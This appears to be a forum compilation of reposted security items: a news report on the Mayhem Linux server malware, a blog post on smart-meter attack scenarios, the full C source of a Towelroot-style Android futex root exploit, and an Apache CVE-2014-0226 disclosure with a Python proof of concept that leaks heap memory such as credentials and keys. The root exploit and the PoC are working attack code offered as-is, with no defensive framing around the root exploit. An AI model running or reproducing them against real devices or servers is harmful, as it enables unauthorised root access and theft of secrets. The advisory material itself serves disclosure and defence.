Manic malware Mayhem spreads through Linux, FreeBSD web servers And how Google could cripple infection rate in a second By Iain Thomson, 18 Jul 2014 Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say. The software nasty uses a grab bag of plugins to cause mischief, and infects systems that are not up to date with security patches. Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov, who work at Russian internet portal Yandex, discovered the malware targeting *nix servers. They traced transmissions from compromised computers to two command and control (C&C) servers. So far they have found 1,400 machines that have fallen to the code, with potentially thousands more to come. "In the *nix world, autoupdate technologies aren't widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly," the trio wrote in a technical report for Virus Bulletin. "For ordinary websites, serious maintenance is quite expensive and often webmasters don't have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets." Mayhem spreads by finding servers hosting websites with a remote file inclusion (RFI) vulnerability – it even uses Google's /humans.txt to test for this. If the ad giant rewrote this file, specifically changing the words "we can shake", Mayhem infections would be slowed – until its rfiscan.so plugin is updated. Once the malware exploits an RFI, or some other weakness, to run a PHP script on a victim, it drops a shared object called libworker.so onto the infected system and pings its C&C servers. It then creates a hidden file system, usually called sd0, and downloads eight plugins, none of which were picked up by the VirusTotal malware scanning tool. These include a couple of brute-force password crackers targeting FTP, Wordpress and Joomla accounts – presumably to spread the malware further – and information-gathering web crawlers, one of which hunts for other sites with RFI holes. Some of the vulnerable web applications Mayhem scans for ... click for slightly larger version (Credit: Kovalev, Otrashkevich, Sidorov) The Yandex trio warn there may be other plugins in circulation, based on data found on the two cracked C&C servers. These include a tool specifically to exploit systems that haven't patched the Heartbleed vulnerability in OpenSSL. The team notes that the Mayhem code does bear several similarities to the Trololo_mod and Effusion families of malware, which target Apache and Nginx servers respectively. They recommend system administrators check their servers to make sure Mayhem's spread is limited. ® Sursa: Manic malware Mayhem spreads through Linux, FreeBSD web servers • The Register
-
Smart Meter Attack Scenarios 12:51 am (UTC-7) | by Rainer Link (Senior Threat Researcher) In our previous post, we looked at how smart meters were being introduced across multiple countries and regions, and why these devices pose security risks to their users. At their heart, a smart meter is simply… a computer. Let’s look at our existing computers – whether they are PCs, smartphones, tablets, or embedded devices. Similarly, these smart meters are communicating via understood technologies: cellular connectivity, power-line networking, or the user’s own Internet connection. With that in mind, we have to consider the possible threats – what could happen if a smart meter is compromised? Similarly, what are the problems that could result if the connectivity of a smart meter is disrupted? Let us see. Perhaps the most obvious risk is simple: meter tampering. If a smart meter can be hacked, inaccurate information can be sent back to the utility, allowing an to adjust the reading and resulting in an inflated bill. Let’s say, for example, that you have an argument with your neighbor. In revenge, if he can access your smart meter, you might see a rather large electric bill. Of course, the bill can also change in the opposite direction. Let’s say you’re engaged in certain activities that require high levels of electricity… altcoin mining, for example. The biggest running cost for such an operation would be the electric bill. The smart meter could be hacked to have a lower reading – or, perhaps, in a location with time-varying electric rates, to make it look like the electricity was used at off-peak times? What are some other threats at the local, “retail” level when it comes to smart meters? Crime gangs (with smarts) may well find uses for smart meters too. Power savings are frequently promoted as a benefit of smart meter. However, power consumption is also a good way of checking if someone is in a home or not. Let’s say that a vulnerability made it easy for somebody other than the homeowner or the utility to see what the power usage was. (It could be as easy as a poorly-designed API, mobile app, or website.) The smart meter would then essentially become a giant “please rob me” sign for properly equipped thieves. Alternately, if that smart meter can be controlled remotely, you now have an excellent way to carry out extortion. Such a nice house you have there, it’d be shame if anything bad happened to its power… The connectivity of the smart meters can also be a security risk. Some meters use the cellular network to provide the connection to the main servers of their utility. The utility would, of course, be paying for the bills of these meters. A truly determined person could abuse this “free” phone to make calls, send text messages, even connect to the Internet. Alternately, the smart meter may use the same Internet connection as the home. This represents a potential risk: if somebody was able to hack the smart meter from the outside, then that attacker would have access to the house’s internal network. This would put your own internal network at risk of attack; it would be as dangerous as letting anyone connect to your home network. None of the above attacks are inevitable. You can build defenses against all of them. However, it is inevitable that somewhere, somehow, the defenses will fail. These attacks are possible, and we will have to figure out how to defend against them, especially once smart meters become more prevalent. All of the attacks I discussed above are essentially small-scale, however. What happens when you look at the security of not just individual meters, but the smart grid as a whole? That’s what we will discuss in the third post in this three-part series on smart meters and smart grids. Sursa: Smart Meter Attack Scenarios | Security Intelligence Blog | Trend Micro
-
/* getroot 2014/07/12 */ /* * Copyright © 2014 CUBE * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <pthread.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/futex.h> #include <sys/resource.h> #include <string.h> #include <fcntl.h> #define FUTEX_WAIT_REQUEUE_PI 11 #define FUTEX_CMP_REQUEUE_PI 12 struct mmsghdr { struct msghdr msg_hdr; unsigned int msg_len; }; //rodata const char str_ffffffff[] = {0xff, 0xff, 0xff, 0xff, 0}; const char str_1[] = {1, 0, 0, 0, 0}; //bss int _swag = 0; int _swag2 = 0; unsigned long HACKS_final_stack_base = 0; pid_t waiter_thread_tid; pthread_mutex_t done_lock; pthread_cond_t done; pthread_mutex_t is_thread_desched_lock; pthread_cond_t is_thread_desched; int do_socket_tid_read = 0; int did_socket_tid_read = 0; int do_splice_tid_read = 0; int did_splice_tid_read = 0; int do_dm_tid_read = 0; int did_dm_tid_read = 0; pthread_mutex_t is_thread_awake_lock; pthread_cond_t is_thread_awake; int HACKS_fdm = 0; unsigned long MAGIC = 0; unsigned long MAGIC_ALT = 0; pthread_mutex_t *is_kernel_writing; pid_t last_tid = 0; int g_argc; char rootcmd[256]; ssize_t read_pipe(void *writebuf, void *readbuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); len = write(pipefd[1], writebuf, count); if (len != count) { printf("FAILED READ @ %p : %d %d\n", writebuf, (int)len, errno); while (1) { sleep(10); } } read(pipefd[0], readbuf, count); close(pipefd[0]); close(pipefd[1]); return len; } ssize_t write_pipe(void *readbuf, void *writebuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); write(pipefd[1], writebuf, count); len = read(pipefd[0], readbuf, count); if (len != count) { printf("FAILED WRITE @ %p : %d %d\n", readbuf, (int)len, errno); while (1) { sleep(10); } } close(pipefd[0]); close(pipefd[1]); return len; } void write_kernel(int signum) { char *slavename; int pipefd[2]; char readbuf[0x100]; unsigned long stackbuf[4]; unsigned long buf_a[0x100]; unsigned long val1; unsigned long buf_b[0x40]; unsigned long val2; unsigned long buf_c[6]; pid_t pid; int i; int ret; pthread_mutex_lock(&is_thread_awake_lock); pthread_cond_signal(&is_thread_awake); pthread_mutex_unlock(&is_thread_awake_lock); if (HACKS_final_stack_base == 0) { printf("cpid1 resumed.\n"); pthread_mutex_lock(is_kernel_writing); HACKS_fdm = open("/dev/ptmx", O_RDWR); unlockpt(HACKS_fdm); slavename = ptsname(HACKS_fdm); open(slavename, O_RDWR); do_splice_tid_read = 1; while (1) { if (did_splice_tid_read != 0) { break; } } read(HACKS_fdm, readbuf, 0x100); write_pipe((void *)(HACKS_final_stack_base + 8), (void *)str_ffffffff, 4); pthread_mutex_unlock(is_kernel_writing); while (1) { sleep(10); } } printf("cpid3 resumed.\n"); pthread_mutex_lock(is_kernel_writing); printf("hack.\n"); read_pipe((void *)HACKS_final_stack_base, stackbuf, 0x10); read_pipe((void *)(stackbuf[3]), buf_a, 0x400); val1 = 0; val2 = 0; pid = 0; for (i = 0; i < 0x100; i++) { if (buf_a == buf_a[i + 1]) { if (buf_a > 0xc0000000) { if (buf_a[i + 2] == buf_a[i + 3]) { if (buf_a[i + 2] > 0xc0000000) { if (buf_a[i + 4] == buf_a[i + 5]) { if (buf_a[i + 4] > 0xc0000000) { if (buf_a[i + 6] == buf_a[i + 7]) { if (buf_a[i + 6] > 0xc0000000) { val1 = buf_a[i + 7]; break; } } } } } } } } } read_pipe((void *)val1, buf_b, 0x100); val2 = buf_b[0x16]; if (val2 > 0xc0000000) { if (val2 < 0xffff0000) { read_pipe((void *)val2, buf_c, 0x18); if (buf_c[0] != 0) { if (buf_c[1] != 0) { if (buf_c[2] == 0) { if (buf_c[3] == 0) { if (buf_c[4] == 0) { if (buf_c[5] == 0) { buf_c[0] = 1; buf_c[1] = 1; write_pipe((void *)val2, buf_c, 0x18); } } } } } } } } buf_b[1] = 0; buf_b[2] = 0; buf_b[3] = 0; buf_b[4] = 0; buf_b[5] = 0; buf_b[6] = 0; buf_b[7] = 0; buf_b[8] = 0; buf_b[10] = 0xffffffff; buf_b[11] = 0xffffffff; buf_b[12] = 0xffffffff; buf_b[13] = 0xffffffff; buf_b[14] = 0xffffffff; buf_b[15] = 0xffffffff; buf_b[16] = 0xffffffff; buf_b[17] = 0xffffffff; write_pipe((void *)val1, buf_b, 0x48); pid = syscall(__NR_gettid); i = 0; while (1) { if (buf_a == pid) { write_pipe((void *)(stackbuf[3] + (i << 2)), (void *)str_1, 4); if (getuid() != 0) { printf("root failed.\n"); while (1) { sleep(10); } } else { break; } } i++; } //rooted sleep(1); if (g_argc >= 2) { system(rootcmd); } system("/system/bin/touch /dev/rooted"); pid = fork(); if (pid == 0) { while (1) { ret = access("/dev/rooted", F_OK); if (ret >= 0) { break; } } printf("wait 10 seconds...\n"); sleep(10); printf("rebooting...\n"); sleep(1); system("reboot"); while (1) { sleep(10); } } pthread_mutex_lock(&done_lock); pthread_cond_signal(&done); pthread_mutex_unlock(&done_lock); while (1) { sleep(10); } return; } void *make_action(void *arg) { int prio; struct sigaction act; int ret; prio = (int)arg; last_tid = syscall(__NR_gettid); pthread_mutex_lock(&is_thread_desched_lock); pthread_cond_signal(&is_thread_desched); act.sa_handler = write_kernel; act.sa_mask = 0; act.sa_flags = 0; act.sa_restorer = NULL; sigaction(12, &act, NULL); setpriority(PRIO_PROCESS, 0, prio); pthread_mutex_unlock(&is_thread_desched_lock); do_dm_tid_read = 1; while (1) { if (did_dm_tid_read != 0) { break; } } ret = syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); printf("futex dm: %d\n", ret); while (1) { sleep(10); } return NULL; } pid_t wake_actionthread(int prio) { pthread_t th4; pid_t pid; char filename[256]; FILE *fp; char filebuf[0x1000]; char *pdest; int vcscnt, vcscnt2; do_dm_tid_read = 0; did_dm_tid_read = 0; pthread_mutex_lock(&is_thread_desched_lock); pthread_create(&th4, 0, make_action, (void *)prio); pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock); pid = last_tid; sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } while (1) { if (do_dm_tid_read != 0) { break; } usleep(10); } did_dm_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 == vcscnt + 1) { break; } usleep(10); } pthread_mutex_unlock(&is_thread_desched_lock); return pid; } int make_socket() { int sockfd; struct sockaddr_in addr = {0}; int ret; int sock_buf_size; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); if (sockfd < 0) { printf("socket failed.\n"); usleep(10); } else { addr.sin_family = AF_INET; addr.sin_port = htons(5551); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); } while (1) { ret = connect(sockfd, (struct sockaddr *)&addr, 16); if (ret >= 0) { break; } usleep(10); } sock_buf_size = 1; setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size)); return sockfd; } void *send_magicmsg(void *arg) { int sockfd; struct mmsghdr msgvec[1]; struct iovec msg_iov[8]; unsigned long databuf[0x20]; int i; int ret; waiter_thread_tid = syscall(__NR_gettid); setpriority(PRIO_PROCESS, 0, 12); sockfd = make_socket(); for (i = 0; i < 0x20; i++) { databuf = MAGIC; } for (i = 0; i < 8; i++) { msg_iov.iov_base = (void *)MAGIC; msg_iov.iov_len = 0x10; } msgvec[0].msg_hdr.msg_name = databuf; msgvec[0].msg_hdr.msg_namelen = 0x80; msgvec[0].msg_hdr.msg_iov = msg_iov; msgvec[0].msg_hdr.msg_iovlen = 8; msgvec[0].msg_hdr.msg_control = databuf; msgvec[0].msg_hdr.msg_controllen = 0x20; msgvec[0].msg_hdr.msg_flags = 0; msgvec[0].msg_len = 0; syscall(__NR_futex, &_swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &_swag2, 0); do_socket_tid_read = 1; while (1) { if (did_socket_tid_read != 0) { break; } } ret = 0; while (1) { ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0); if (ret <= 0) { break; } } if (ret < 0) { perror("SOCKSHIT"); } printf("EXIT WTF\n"); while (1) { sleep(10); } return NULL; } void *search_goodnum(void *arg) { int ret; char filename[256]; FILE *fp; char filebuf[0x1000]; char *pdest; int vcscnt, vcscnt2; unsigned long magicval; pid_t pid; unsigned long goodval, goodval2; unsigned long addr, setaddr; int i; char buf[0x1000]; syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); while (1) { ret = syscall(__NR_futex, &_swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag); if (ret == 1) { break; } usleep(10); } wake_actionthread(6); wake_actionthread(7); _swag2 = 0; do_socket_tid_read = 0; did_socket_tid_read = 0; syscall(__NR_futex, &_swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag2); while (1) { if (do_socket_tid_read != 0) { break; } } sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } did_socket_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 == vcscnt + 1) { break; } usleep(10); } printf("starting the dangerous things.\n"); *((unsigned long *)(MAGIC_ALT - 4)) = 0x81; *((unsigned long *)MAGIC_ALT) = MAGIC_ALT + 0x20; *((unsigned long *)(MAGIC_ALT + 8)) = MAGIC_ALT + 0x28; *((unsigned long *)(MAGIC_ALT + 0x1c)) = 0x85; *((unsigned long *)(MAGIC_ALT + 0x24)) = MAGIC_ALT; *((unsigned long *)(MAGIC_ALT + 0x2c)) = MAGIC_ALT + 8; *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; magicval = *((unsigned long *)MAGIC); wake_actionthread(11); if (*((unsigned long *)MAGIC) == magicval) { printf("using MAGIC_ALT.\n"); MAGIC = MAGIC_ALT; } while (1) { is_kernel_writing = (pthread_mutex_t *)malloc(4); pthread_mutex_init(is_kernel_writing, NULL); *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; pid = wake_actionthread(11); goodval = *((unsigned long *)MAGIC) & 0xffffe000; printf("%p is a good number.\n", (void *)goodval); do_splice_tid_read = 0; did_splice_tid_read = 0; pthread_mutex_lock(&is_thread_awake_lock); kill(pid, 12); pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock); pthread_mutex_unlock(&is_thread_awake_lock); while (1) { if (do_splice_tid_read != 0) { break; } usleep(10); } sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } did_splice_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 != vcscnt + 1) { break; } usleep(10); } goodval2 = 0; *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; *((unsigned long *)(MAGIC + 0x24)) = goodval + 8; wake_actionthread(12); goodval2 = *((unsigned long *)(MAGIC + 0x24)); printf("%p is also a good number.\n", (void *)goodval2); for (i = 0; i < 9; i++) { *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; pid = wake_actionthread(10); if (*((unsigned long *)MAGIC) < goodval2) { HACKS_final_stack_base = *((unsigned long *)MAGIC) & 0xffffe000; pthread_mutex_lock(&is_thread_awake_lock); kill(pid, 12); pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock); pthread_mutex_unlock(&is_thread_awake_lock); write(HACKS_fdm, buf, 0x1000); while (1) { sleep(10); } } } } return NULL; } void *accept_socket(void *arg) { int sockfd; int yes; struct sockaddr_in addr = {0}; int ret; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); yes = 1; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes)); addr.sin_family = AF_INET; addr.sin_port = htons(5551); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)); listen(sockfd, 1); while(1) { ret = accept(sockfd, NULL, NULL); if (ret < 0) { printf("**** SOCK_PROC failed ****\n"); while(1) { sleep(10); } } else { printf("i have a client like hookers.\n"); } } return NULL; } void init_exploit() { unsigned long addr; pthread_t th1, th2, th3; printf("running with pid %d\n", getpid()); pthread_create(&th1, NULL, accept_socket, NULL); addr = (unsigned long)mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); addr += 0x800; MAGIC = addr; if ((long)addr >= 0) { printf("first mmap failed?\n"); while (1) { sleep(10); } } addr = (unsigned long)mmap((void *)0x100000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); addr += 0x800; MAGIC_ALT = addr; if (addr > 0x110000) { printf("second mmap failed?\n"); while (1) { sleep(10); } } pthread_mutex_lock(&done_lock); pthread_create(&th2, NULL, search_goodnum, NULL); pthread_create(&th3, NULL, send_magicmsg, NULL); pthread_cond_wait(&done, &done_lock); return; } int main(int argc, char **argv) { g_argc = argc; if (argc >= 2) { strcpy(rootcmd, argv[1]); } init_exploit(); printf("\n"); printf("done root command.\n"); while (1) { sleep(10); } return 0; } Sursa: [C] Toweelroot - Pastebin.com
-
Apache HTTPd - description of the CVE-2014-0226. From: funky.koval () hushmail com Date: Mon, 21 Jul 2014 08:55:19 +0000 Hi there, --[ 0. Sparse summary Race condition between updating httpd's "scoreboard" and mod_status, leading to several critical scenarios like heap buffer overflow with user supplied payload and leaking heap which can leak critical memory containing htaccess credentials, ssl certificates private keys and so on. --[ 1. Prerequisites Apache httpd compiled with MPM event or MPM worker. The tested version was 2.4.7 compiled with: ./configure --enable-mods-shared=reallyall --with-included-apr The tested mod_status configuration in httpd.conf was: SetHandler server-status ExtendedStatus On --[ 2. Race Condition Function ap_escape_logitem in server/util.c looks as follows: 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char *str) 1909{ 1910 char *ret; 1911 unsigned char *d; 1912 const unsigned char *s; 1913 apr_size_t length, escapes = 0; 1914 1915 if (!str) { 1916 return NULL; 1917 } 1918 1919 /* Compute how many characters need to be escaped */ 1920 s = (const unsigned char *)str; 1921 for (; *s; ++s) { 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) { 1923 escapes++; 1924 } 1925 } 1926 1927 /* Compute the length of the input string, including NULL */ 1928 length = s - (const unsigned char *)str + 1; 1929 1930 /* Fast path: nothing to escape */ 1931 if (escapes == 0) { 1932 return apr_pmemdup(p, str, length); 1933 } In the for-loop between 1921 and 1925 lines function is computing the length of supplied str (almost like strlen, but additionally it counts special characters which need to be escaped). As comment in 1927 value says, function computes count of bytes to copy. If there's nothing to escape function uses apr_pmemdup to duplicate the str. In our single-threaded mind everything looks good, but tricky part starts when we introduce multi-threading. Apache in MPM mode runs workers as threads, let's consider the following scenario: 1) ap_escape_logitem(pool, "") is called 2) for-loop in 1921 line immediately escapes, because *s is in first loop run 3) malicious thread change memory under *s to another value (something which is not ) 4) apr_pmemdup copies that change value to new string and returns it Output from the ap_escape_logitem is considered to be a string, if scenario above would occur, then returned string would not be zeroed at the end, which may be harmful. The mod_status code looks as follows: 833 ap_rprintf(r, "%s%s" 834 "%snn", 835 ap_escape_html(r->pool, 836 ws_record->client), 837 ap_escape_html(r->pool, 838 ws_record->vhost), 839 ap_escape_html(r->pool, 840 ap_escape_logitem(r->pool, 841 ws_record->request))); The relevant call to ap_escape_html() is at line 839 after the evaluation of ap_escape_logitem(). The first argument passed to the ap_escape_logitem() is in fact an apr pool associated with the HTTP request and defined in the request_rec structure. This code is a part of a larger for-loop where code is iterating over worker_score structs which is defined as follows: 90struct worker_score { 91#if APR_HAS_THREADS 92 apr_os_thread_t tid; 93#endif 94 int thread_num; 95 /* With some MPMs (e.g., worker), a worker_score can represent 96 * a thread in a terminating process which is no longer 97 * represented by the corresponding process_score. These MPMs 98 * should set pid and generation fields in the worker_score. 99 */ 100 pid_t pid; 101 ap_generation_t generation; 102 unsigned char status; 103 unsigned short conn_count; 104 apr_off_t conn_bytes; 105 unsigned long access_count; 106 apr_off_t bytes_served; 107 unsigned long my_access_count; 108 apr_off_t my_bytes_served; 109 apr_time_t start_time; 110 apr_time_t stop_time; 111 apr_time_t last_used; 112#ifdef HAVE_TIMES 113 struct tms times; 114#endif 115 char client[40]; /* Keep 'em small... but large enough to hold an IPv6 address */ 116 char request[64]; /* We just want an idea... */ 117 char vhost[32]; /* What virtual host is being accessed? */ 118}; The 'request' field in a worker_score structure is particularly interesting - this field can be changed inside the copy_request function, which is called by the update_child_status_internal. This change may occur when the mod_status is iterating over the workers at the same time the ap_escape_logitem is called within a different thread, leading to a race condition. We can trigger this exact scenario in order to return a string without a trailing . This can be achived by running two clients, one triggering the mod_status handler and second sending random requests to the web server. Let's consider the following example: 1) the mod_status iterates over workers invoking update_child_status_internal() 2) at some point for one worker mod_status calls ap_escape_logitem(pool, ws_record->request) 3) let's asume that ws_record->request at the beginning is "" literally at the first byte. 4) inside the ap_escape_logitem function the length of the ws_record->request is computed, which is 1 (an empty string consisting of ) 5) another thread modifies ws_record->request (in fact it's called ws->request in update_child_status_internal function but it's exactly the same location in memory) and puts there i.e. "GET / HTTP/1.0" 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the first one byte from "GET / HTTP/1.0" - "G" in that case and returns it. The ap_pmemdup looks as follows: 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void *m, apr_size_t n) 113{ 114 void *res; 115 116 if (m == NULL) 117 return NULL; 118 res = apr_palloc(a, n); 119 memcpy(res, m, n); 120 return res; It allocates memory using apr_palloc function which returns "ditry" memory (note that apr_pcalloc overwrite allocated memory with NULs). So it's non-deterministic what's after the copied "G" byte. There might be or might be not. For now let's assume that the memory allocated by apr_palloc was dirty (containing random bytes). 7) ap_escape_logitem returns "G....." .junk. "" The value from the example above is then pushed to the ap_escape_html2 function which is also declared in util.c: 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char *s, int toasc) 1861{ 1862 int i, j; 1863 char *x; 1864 1865 /* first, count the number of extra characters */ 1866 for (i = 0, j = 0; s[i] != ''; i++) 1867 if (s[i] == '') 1868 j += 3; 1869 else if (s[i] == '&') 1870 j += 4; 1871 else if (s[i] == '"') 1872 j += 5; 1873 else if (toasc && !apr_isascii(s[i])) 1874 j += 5; 1875 1876 if (j == 0) 1877 return apr_pstrmemdup(p, s, i); 1878 1879 x = apr_palloc(p, i + j + 1); 1880 for (i = 0, j = 0; s[i] != ''; i++, j++) 1881 if (s[i] == '') { 1886 memcpy(&x[j], ">", 4); 1887 j += 3; 1888 } 1889 else if (s[i] == '&') { 1890 memcpy(&x[j], "&", 5); 1891 j += 4; 1892 } 1893 else if (s[i] == '"') { 1894 memcpy(&x[j], """, 6); 1895 j += 5; 1896 } 1897 else if (toasc && !apr_isascii(s[i])) { 1898 char *esc = apr_psprintf(p, "%3.3d;", (unsigned char)s[i]); 1899 memcpy(&x[j], esc, 6); 1900 j += 5; 1901 } 1902 else 1903 x[j] = s[i]; 1904 1905 x[j] = ''; 1906 return x; 1907} If the string from the example above would be passed to this function we should get the following code-flow: 1) in the for-loop started in line 1866 we count the length of escaped string 2) because 's' string contains junk (due to only one byte being allocated by the apr_palloc function), it may contain '>' character. Let's assume that this is our case 3) after for-loop in 1866 line 'j' is greater than 0 (at least one s[i] equals '>' as assumed above 4) in the 1879 line memory for escaped 'd' string is allocated 5) for-loop started in line 1880 copies string 's' to the escaped 'd' string BUT apr_palloc has allocated only one byte for 's'. Thus, for each i > 0 the loop reads random memory and copies that value to 'd' string. At this point it's possible to trigger an information leak vulnerability (see section 5). However the 's' string may overlap with 'd' i.e.: 's' is allocated under 0 with contents s = "AAAAAAAA>" 'd' is allocated under 8 then s[8] = d[0]. If that would be the case, then for-loop would run forever (s[i] never would be since it was overwritten in the loop by non-zero). Forever... until it hits an unmapped memory or read only area. Part of the scoreboard.c code which may overwrite the ws_record->request was discovered using a tsan: #1 ap_escape_logitem ??:0 (exe+0x0000000411f2) #2 status_handler /home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 (mod_status.so+0x0000000044b0) #3 ap_run_handler ??:0 (exe+0x000000084d98) #4 ap_invoke_handler ??:0 (exe+0x00000008606e) #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9) #6 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b143e) #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) #8 ap_run_process_connection ??:0 (exe+0x00000009d156) #9 process_socket event.c:0 (exe+0x0000000cc65e) #10 worker_thread event.c:0 (exe+0x0000000d0945) #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) #12 :0 (libtsan.so.0+0x00000001b279) Previous write of size 1 at 0x7feff2b862b8 by thread T2: #0 update_child_status_internal scoreboard.c:0 (exe+0x00000004d4c6) #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693) #2 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b139a) #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) #4 ap_run_process_connection ??:0 (exe+0x00000009d156) #5 process_socket event.c:0 (exe+0x0000000cc65e) #6 worker_thread event.c:0 (exe+0x0000000d0945) #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) #8 :0 (libtsan.so.0+0x00000001b279) --[ 3. Consequences Race condition described in section 2, may lead to: - information leak in case when the string returned by ap_escape_logitem is not at the end, junk after copied bytes may be valuable - overwriting heap with a user supplied value which may imply code execution --[ 4. Exploitation In order to exploit the heap overflow bug it's necessary to get control over: 1) triggering the race-condition bug 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap 3) part of 's' which doesn't overlap with 'd' (this string is copied over and over again) 4) overwriting the heap in order to get total control over the cpu or at least modify the apache's handler code flow for our benefits --[ 5. Information Disclosure Proof of Concept -- cut #! /usr/bin/env python import httplib import sys import threading import subprocess import random def send_request(method, url): try: c = httplib.HTTPConnection('127.0.0.1', 80) c.request(method,url); if "foo" in url: print c.getresponse().read() c.close() except Exception, e: print e pass def mod_status_thread(): while True: send_request("GET", "/foo?notables") def requests(): evil = ''.join('A' for i in range(random.randint(0, 1024))) while True: send_request(evil, evil) threading.Thread(target=mod_status_thread).start() threading.Thread(target=requests).start() -- cut Below are the information leak samples gathered by running the poc against the testing Apache instance. Leaks include i.e. HTTP headers, htaccess content, httpd.conf content etc. On a live systems with a higher traffic samples should be way more interesting. $ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v 